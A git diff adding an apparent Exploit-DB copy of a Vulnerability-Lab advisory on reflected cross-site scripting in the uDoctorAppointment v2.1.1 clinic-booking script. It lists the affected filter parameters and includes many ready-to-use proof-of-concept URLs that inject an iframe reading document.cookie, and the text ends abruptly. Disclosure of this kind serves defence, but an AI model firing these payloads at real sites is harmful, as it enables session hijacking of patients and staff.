diff --git a/exploits/php/webapps/50676.txt b/exploits/php/webapps/50676.txt
new file mode 100644
index 000000000..34b9b5e7d
--- /dev/null
+++ b/exploits/php/webapps/50676.txt
@@ -0,0 +1,265 @@
+# Exploit Title: uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)
+# Exploit Author: Vulnerability-Lab
+# Date: 15/12/2021
+
+Document Title:
+===============
+uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2288
+
+
+Release Date:
+=============
+2021-12-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2288
+
+
+Common Vulnerability Scoring System:
+====================================
+5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Clinic management, doctor or therapist online medical appointment scheduling system for the management of health care.
+uDoctorAppointment script allows doctors to register and appropriate membership plan with different features.
+Patients can view doctor profiles before booking appointments. The site administrator or doctor may create and
+manage advanced schedules, create working time slots for each day of the week, define time off etc.
+
+(Copy of the Homepage:https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uDoctorAppointment script web-application.
+
+
+Affected Product(s):
+====================
+ApPHP
+Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application)
+Product: ApPHP MVC Framework v1.1.5 (Framework)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-01: Researcher Notification & Coordination (Security Researcher)
+2021-09-02: Vendor Notification (Security Department)
+2021-09-10: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-12-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple non-persistent cross site vulnerabilities has been discovered in the official uDoctorAppointment v2.1.1 script web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
+to web-application requests from the client-side.
+
+The cross site security web vulnerabilities are located in the `created_at`, `created_date` and `sent_at` parameters of the `filter` web module.
+The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script
+code is GET and the attack vector of the vulnerability is non-persistent on client-side.
+
+Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
+to malicious source and non-persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] ./doctorReviews/doctorReviews
+[+] ./orders/orders
+[+] /mailingLog/manage
+[+] /orders/doctorsManage
+[+] /news/manage
+[+] /newsSubscribers/manage
+[+] /doctorReviews/manage/status/approved
+[+] /appointments/manage
+
+Vulnerable Parameter(s):
+[+] created_at
+[+] created_date
+[+] sent_at
+[+] appointment_date
+
+Affected Module(s):
+[+] Filter
+
+
+Proof of Concept (PoC):
+=======================
+The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
+For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Exploitation: Payload
+">%20
+
+
+Role: Patient (Frontend - created_at)
+https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter
+-
+https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
+
+
+Role: Doctor (Frontend - created_date)
+https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter
+-
+https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter
+
+
+Role: Admin (Backend -
+https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter
+https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter
+https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=2021-09-01&but_filter=Filter
+https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=2021-09-01&but_filter=Filter
+https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=2021-09-01&but_filter=Filter
+https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=2021-09-01&but_filter=Filter
+https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter
+-
+https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=0&but_filter=Filter
+https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter
+https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
+https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
+https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
+https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
+https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter
+
+
+Vulnerable Source: ./mailingLog
+
"